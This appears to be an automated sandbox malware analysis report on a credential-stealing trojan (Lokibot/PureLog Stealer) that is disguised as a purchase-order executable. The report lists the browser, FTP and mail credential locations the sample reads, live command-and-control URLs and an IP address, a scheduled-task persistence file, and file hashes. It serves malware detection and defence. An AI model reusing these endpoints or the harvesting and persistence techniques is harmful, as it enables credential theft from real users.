Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: PopPassword		14_2_0040D069
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: SmtpPassword		14_2_0040D069

Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: PO-0Y9005373R664.exe, type: SAMPLE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VvtddClQv.exe.29b9d20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.5500000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.PO-0Y9005373R664.exe.6c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-0Y9005373R664.exe	53%	ReversingLabs	Win32.Trojan.Leonem
PO-0Y9005373R664.exe	59%	Virustotal		Browse
PO-0Y9005373R664.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\VvtddClQv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\VvtddClQv.exe	53%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\AppData\Roaming\VvtddClQv.exe	59%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://104.248.205.66/index.php/17008709	100%	Avira URL Cloud	phishing
http://104.248.205.66/index.php/17008709	20%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://104.248.205.66/index.php/17008709	true	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO-0Y9005373R664.exe, 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VvtddClQv.exe, 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr	false	URL Reputation: safe	unknown
http://www.ibsensoftware.com/	VvtddClQv.exe, VvtddClQv.exe, 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.248.205.66	unknown	United States		14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501076
Start date and time:	2024-08-29 12:01:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-0Y9005373R664.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/17@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 120 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:02:42	API Interceptor	45x Sleep call for process: PO-0Y9005373R664.exe modified
06:02:47	API Interceptor	35x Sleep call for process: powershell.exe modified
06:02:51	API Interceptor	1x Sleep call for process: VvtddClQv.exe modified
12:02:49	Task Scheduler	Run new task: VvtddClQv path: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.248.205.66	file.exe	Get hash	malicious	Lokibot	Browse	104.248.205.66/index.php/pages?id=281164463123697
	3HyQ3UqWop.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/posts.php?8=1
	T#U00f6r#U00f6lt fizet#U00e9si megb#U00edz#U00e1s.cmd.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/modify.php?edit=1
	SecuriteInfo.com.Win32.PWSX-gen.6895.26796.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/edit.php?name=1
	FedEx_AWB#53052032046.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/edit.php?name=1
	b684fa6621ac71f22449614bfe6064d3cc91fd7aeb3c8d16fb6d586947c85bc3_payload.exe	Get hash	malicious	Lokibot	Browse	104.248.205.66/index.php/posts.php?8=1
	FedEx_AWB#53053132046.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/edit.php?name=1
	DHL Receipt_27248791029.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/posts.php?8=1
	Request For Quote (Kobelco) INV#180222OM24 & #160222OM71.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/pages?id=281164463123697
	jnaBWnyCez.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.248.205.66/index.php/modify?file=1

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	Unknown	Browse	104.248.15.35
	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	Unknown	Browse	104.248.15.35
	https://1113a6f.netsolhost.com/	Get hash	malicious	Unknown	Browse	138.197.61.175
	http://pub-3a8cf82f2ab64d7aad1bd2333443f1dc.r2.dev/newdoc.html	Get hash	malicious	Unknown	Browse	67.205.136.183
	http://linkplea.se/doar	Get hash	malicious	Unknown	Browse	165.22.250.235
	http://leembal.com.mx	Get hash	malicious	Unknown	Browse	157.230.60.69
	https://pub-6a08b05596ae4c139f14fc7b92eb075c.r2.dev/NewOneDrive78.html	Get hash	malicious	Unknown	Browse	157.245.69.91
	582czwg1Jl.exe	Get hash	malicious	Unknown	Browse	95.85.16.212
	https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=	Get hash	malicious	Unknown	Browse	157.230.22.210
	http://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13	Get hash	malicious	Phisher	Browse	159.203.57.37

Process:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VvtddClQv.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\VvtddClQv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbumgdo1.i4u.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdg3ytxr.0gz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ig1aggtv.1x5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbb03zfi.soz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rweqh102.h0i.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2nf3jon.4uy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ul5tz4st.ukm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x50tsrpk.imz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpB962.tmp

Download File

Process:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.110860658719488
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTxv
MD5:	D94CF456F827040D51B15D86759578BF
SHA1:	2B238E094B110ECDAB68AA7F10D3542FC939F3AE
SHA-256:	D6773C572ECD5142FFE0DB736813309C2E2E6E8593D214D5C66C52FDAE2853E7
SHA-512:	16E30A67155B64D692BCF3B8E8C14EC98E98832670C4F281EE790BCDE25ED4DD66C91D8BC240B3AA43428ADBF3EC6D90477BB94EF24D5332FF137D8DE7EF6CCA
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. 